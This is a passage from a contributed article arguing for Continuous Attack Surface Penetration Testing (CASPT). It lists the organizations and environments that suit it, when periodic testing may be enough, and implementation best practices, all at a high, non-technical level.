**Scenario:** Organizations that are considered high-value targets for cyberattacks, such as those in finance, healthcare, government, or technology sectors.

**Reason:** High-value targets are more likely to be under constant threat from sophisticated attackers. CASPT helps to uncover vulnerabilities before attackers do, providing a critical layer of defense by constantly assessing and mitigating risks.

****4\. Mature Security Programs****

**Scenario:** Organizations that have already established a robust security program and are looking to move towards a more proactive security approach with offensive security tools.

**Reason:** For organizations with mature security practices, CASPT is a natural evolution. It complements existing security measures, balances existing defensive tools with offensive security tools, and provides ongoing validation of security controls, ensuring they remain effective against emerging threats.

****5\. Cloud-Native or Hybrid Environments****

**Scenario:** Organizations that heavily rely on cloud infrastructure or operate in hybrid or multicloud environments.

**Reason:** Cloud environments are often more fluid and dynamic, with assets being spun up and down frequently. CASPT in these environments ensures that security assessments are as agile as the infrastructure, addressing vulnerabilities in real-time and adapting to the shifting landscape.

****6\. Increased DevSecOps Practices****

**Scenario:** Organizations undergoing digital transformation initiatives, such as moving to microservices architectures, adopting DevOps practices, or integrating IoT devices.

**Reason:** Digital transformation often introduces new technologies and processes that may not have been fully assessed for security risks. CASPT provides a mechanism to ensure that as the organization transforms, security keeps pace with these changes, preventing gaps that could be exploited.

****7\. Merger & Acquisition(M&A) Activities****

**Scenario:** Organizations involved in mergers or acquisitions where networks, software, and people, processes, and technologies merge and overlap.

**Reason**: M&A activities can introduce new systems and networks into an organization, often with little time for traditional security assessments. CASPT ensures that any vulnerabilities in newly acquired assets are quickly identified and addressed, reducing the risk of integrating vulnerable systems.

****8\. Third-Party Risk Management****

**Scenario:** Organizations that rely heavily on third-party vendors or partners where the supply chain is changing, growing, or is fluid with incoming and outgoing vendors.

**Reason**: Third-party vendors can introduce vulnerabilities into an organization's environment especially as confidential and sensitive data is shared and exchanged between organizations. CASPT helps identify and mitigate these risks by regularly assessing third-party systems and integrations, ensuring they do not become an attack vector.

****9\. Alignment with DevSecOps****

**Scenario:** For organizations adopting DevSecOps practices, CASPT integrates seamlessly into the CI/CD pipeline, ensuring that security is embedded into the development process.

**Reason:** This helps in identifying vulnerabilities early in the software development life cycle (SDLC), reducing the cost and effort of fixing them later.

****10\. Enhanced Incident Response****

**Scenario**: Continuous pentesting provides a constant flow of security data, which can be invaluable for incident response teams.

**Reason:** This data helps in understanding the organization's security posture and in identifying potential weaknesses that could be exploited during an attack.

****When Not to Consider Continuous Pentesting****

Smaller organizations with limited security budgets or personnel may find it challenging to implement and manage CASPT. In such cases, using a third-party CASPT provider can help provide the expertise and resources needed. Also combined with periodic pentesting and other security measures may make CASPT more feasible.

In addition, organizations with relatively static IT environments may not require the constant assessment provided by CASPT. Periodic pentests, combined with regular security audits, may be sufficient to maintain security.

CASPT is particularly beneficial for organizations operating in dynamic, high-risk environments, those with stringent compliance requirements, or those looking to adopt a more proactive security posture. It provides real-time visibility into vulnerabilities, enhances risk management, and aligns well with modern security practices like DevSecOps.

****Best Practices for Implementing Continuous Attack Surface Penetration Testing****

Implementing CASPT requires careful planning and execution. Here are some best practices to consider:

1.  **Determine Frequency**: The frequency of CASPT should be based on the organization's risk profile, the criticality of assets, and the frequency of changes to the environment. For example, highly dynamic environments may require daily or weekly testing, while less dynamic environments may only need weekly or bi-monthly testing.
2.  **Set Clear Objectives and Goals:** Before implementing CASPT, organizations should define clear objectives and goals for the testing process. This includes identifying the assets to be tested, the types of vulnerabilities to focus on, and the desired outcomes of the testing.
3.  **Establish Clear Communication Channels:** Effective communication is critical to the success of CASPT. Organizations should establish clear communication channels between security teams, developers, and other stakeholders to ensure that vulnerabilities are addressed promptly.
4.  **Use of Both Manual and Automated Testing Techniques:** While automation is a key component of CASPT, manual testing is equally important. Automated tools can quickly identify known vulnerabilities, while manual testing can uncover more complex issues that require human expertise.

****Conclusion****

Continuous Attack Surface Penetration Testing represents a fundamental shift in how organizations approach security. By adopting a proactive, continuous approach to penetration testing, organizations can stay ahead of emerging threats, improve their security development cycle, and protect their most valuable assets. While the initial investment in CASPT may be higher, the long-term benefits—such as cost savings, increased visibility, and enhanced compliance—make it a critical component of any modern security strategy.

In a world where cyber threats are constantly evolving, annual penetration testing is no longer sufficient. Continuous Attack Surface Penetration Testing offers a more effective, comprehensive, and timely approach to securing an organization's digital assets. By integrating CASPT with other offensive security practices like Attack Surface Management and Red Teaming, organizations can ensure a robust offense against even the most sophisticated attackers.

In summary, Continuous Penetration Attack Surface Testing is not just a security measure—it's a strategic advantage. Organizations that embrace CASPT can expect to achieve greater resilience by taking the fight back to attackers and playing at their own game.

Found this article interesting? This article is a contributed piece from one of our valued partners. Follow us on Twitter __ and LinkedIn to read more exclusive content we post.

Tag

#sql